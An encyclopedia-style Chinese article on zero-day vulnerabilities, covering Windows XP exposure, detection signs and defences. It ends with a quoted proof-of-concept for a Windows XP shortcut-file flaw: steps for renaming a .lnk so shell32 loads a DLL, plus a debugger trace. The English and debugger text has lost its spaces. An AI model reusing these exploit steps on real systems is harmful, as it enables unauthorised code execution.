零日漏洞

攻擊威脅

攻擊代碼

微軟可信賴計算部門（TrustworthyComputing）主管蒂姆•瑞恩斯（TimRains）稱：2012年7月至2013年7月間，作為受攻擊產品，WindowsXP系統曾45次出現在微軟的安全威脅公告中。其中有30個安全威脅同時影響到了Windows 7和Windows 8 。

系統被發現存在漏洞後，由於原廠商需要時間確認漏洞的存在，需要時間評估漏洞的風險，也需要時間來確定漏洞修正的方法，實現該方法後還要驗證、評估和質檢，因此很難在當日就拿出補丁。由於廠商缺少補丁，而最終用戶又缺少防範意識，從而能夠造成巨大破壞。

發現方法

按照定義，有關“零日漏洞”攻擊的詳細信息只在攻擊被確定後才會出現。以下是當發生“零日漏洞”攻擊時將看到的重要跡象：發源於一台客戶機或伺服器的出乎意料的合法數據流或大量的掃描活動；合法連線埠上的意外數據流；甚至在安裝了最新的補丁程式後，受到攻擊的客戶機或伺服器仍發生類似活動。

防禦方法

零日漏洞

部署提供全面保護的入侵防護系統（IPS）。在考慮IPS時，尋找以下功能：網路級保護、套用完整性檢查、套用協定“徵求意見”（RFC）確認、內容確認和取證能力。

即使在採用以上措施後，企業仍可能受到“零日漏洞”影響。周密計畫的事件回響措施以及包括關鍵任務活動優先次序在內的定義的規則和規程，對於將企業損失減少到最小程度至關重要。

這可以通過將連線惟一限制在滿足企業需要所必須的機器上。這樣做可以在發生初次感染後，減少利用漏洞的攻擊所傳播的範圍。

對於Windows XP用戶來說，進行系統升級，或者可以選擇Windows 7，其功能與WindowsXP功能類似。

“零日漏洞”攻擊對於警惕性最高的系統管理人員來說也是一種挑戰。但是，部署到位的安全護保措施可以大大降低關鍵數據和系統面臨的風險。

攻擊代碼

From:
1.Unzipthefilesin'C:\'.StartaDbgVieworpasteaKDtoyourVM.
2.Rename'suckme.lnk_'to'suckme.lnk'andletthemagicdotherestofshell32.dll.
3.Lookatyourlogs.
TestedunderXPSP3.
kd>g
Breakpoint1hit
eax=00000001 ebx=00f5ee7cecx=0000c666edx=00200003esi=00000001edi=7c80a6e4
eip=7ca78712 esp=00f5e9c4ebp=00f5ec18iopl=0 nvupeiplnznaponc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202.SHELL32!_LoadCPLModule+0x10d:
001b:7ca78712ff15a0159d7c call dwordptr[SHELL32!_imp__LoadLibraryW(7c9d15a0)]ds:0023:7c9d15a0={kernel32!LoadLibraryW(7c80aeeb)}
kd>ddesp
00f5e9c4 00f5ee7c000a27bc00f5ee7800000000
00f5e9d4 000000200000000800f5ee7c00000000
00f5e9e4 000000000000007b0000000000000000
00f5e9f4 00200073002000e00000064c0000028c
00f5ea04 1530000a00000000003a00430064005c
00f5ea14 006c006c0064002e006c006c006d002e
00f5ea24 006e0061006600690073006500000074
00f5ea34 000906087c92005d0000000000000007
kd>db00f5ee7c
00f5ee7c 43003a005c006400-6c006c002e006400 C.:.\.d.l.l...d.
00f5ee8c 6c006c000000927c-c8f2f50000177202 l.l....|......r.
00f5ee9c 4bd20000d8f2f500-8bd2a17c00000000 K..........|....
00f5eeac ac809d7c30d80d00-34d80d00b8d70d00 ...|0...4.......
00f5eebc 9ad2a17c30d80d00-c8f2f50050401500 ...|0.......P@..
00f5eecc 5040150000000000-b800927c40b70c00 P@.........|@...
00f5eedc a8eff5004100927c-180709005d00927c ....A..|....]..|
00f5eeec c8f2f50000eff500-00000000b800927c ...............|
kd>kv
ChildEBPRetAddrArgstoChild
00f5ec187ca81a7400f5ee7c000a27bc00f5f2c4SHELL32!_LoadCPLModule+0x10d(FPO:[1,145,4])
00f5ee507ca8254300f5ee74000a27bc000a27c0SHELL32!CPL_LoadAndFindApplet+0x4a(FPO:[4,136,4])
00f5f2947cb56065000a25b4000a27bc000a27c0SHELL32!CPL_FindCPLInfo+0x46(FPO:[4,264,4])
00f5f2b87ca13714000000820000000000000104SHELL32!CCtrlExtIconBase::_GetIconLocationW+0x7b(FPO:[5,0,0])
00f5f2d47ca1d306000a25ac0000008200f5f570SHELL32!CExtractIconBase::GetIconLocation+0x1f(FPO:[6,0,0])
00f5f4107ca133b6000dd7e00000008200f5f570SHELL32!CShellLink::GetIconLocation+0x69(FPO:[6,68,4])
00f5f77c7ca03c88000dd7e0000000000015aa00SHELL32!_GetILIndexGivenPXIcon+0x9c(FPO:[5,208,4])
00f5f7a47ca0669300131c60000dd7e00015aa00SHELL32!SHGetIconFromPIDL+0x90(FPO:[5,0,4])
00f5fe207ca12db000131c640015aa0000000000SHELL32!CFSFolder::GetIconOf+0x24e(FPO:[4,405,4])
00f5fe407ca15e3c00131c6000131c640015aa00SHELL32!SHGetIconFromPIDL+0x20(FPO:[5,0,0])
00f5fe687ca03275000f80900014d5b00014a910SHELL32!CGetIconTask::RunInitRT+0x47(FPO:[1,2,4])
00f5fe8475f11b9a000f809075f11b1875f10000SHELL32!CRunnableTask::Run+0x54(FPO:[1,1,4])
00f5fee077f4959800155658000cb74877f4957bBROWSEUI!CShellTaskScheduler_ThreadProc+0x111(FPO:[1,17,0])
00f5fef87c937ac2000cb7487c98e4400014cfe0SHLWAPI!ExecuteWorkItem+0x1d(FPO:[1,0,4])
00f5ff407c937b0377f4957b000cb74800000000ntdll!RtlpWorkerCallout+0x70(FPO:[Non-Fpo])
00f5ff607c937bc500000000000cb7480014cfe0ntdll!RtlpExecuteWorkerRequest+0x1a(FPO:[3,0,0])
00f5ff747c937b9c7c937ae900000000000cb748ntdll!RtlpApcCallout+0x11(FPO:[4,0,0])
00f5ffb47c80b7290000000000edfce400edfce8ntdll!RtlpWorkerThread+0x87(FPO:[1,7,0])
00f5ffec000000007c9202500000000000000000kernel32!BaseThreadStart+0x37(FPO:[Non-Fpo])

涉及事件

零日漏洞